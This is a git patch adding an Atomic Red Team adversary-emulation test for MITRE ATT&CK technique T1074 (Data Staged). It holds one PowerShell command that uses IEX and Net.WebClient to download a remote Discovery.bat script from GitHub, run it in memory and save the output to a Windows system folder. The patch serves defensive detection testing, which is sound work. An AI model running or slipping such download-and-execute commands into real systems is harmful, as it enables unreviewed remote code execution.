From aa0dfa080011748e08ef8dca2ccf059255f91305 Mon Sep 17 00:00:00 2001
From: Michael Haag
 <“mike@redcanary.com  git config --global user.name “Michael Haag>
Date: Thu, 24 May 2018 00:39:59 -0400
Subject: [PATCH] Add test for T1074, Data Staged

Data Staged Yaml
---
 atomics/T1074/T1074.yaml | 16 ++++++++++++++++
 1 file changed, 16 insertions(+)
 create mode 100644 atomics/T1074/T1074.yaml

diff --git a/atomics/T1074/T1074.yaml b/atomics/T1074/T1074.yaml
new file mode 100644
index 00000000..7b081537
--- /dev/null
+++ b/atomics/T1074/T1074.yaml
@@ -0,0 +1,16 @@
+---
+attack_technique: T1074
+display_name: Data Staged
+
+atomic_tests:
+- name: Stage data from Discovery.bat
+  description: |
+    Utilize powershell to download discovery.bat and save to a local file
+
+  supported_platforms:
+    - windows
+
+  executor:
+    name: powershell
+    command: |
+      powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')" > c:\windows\pi.log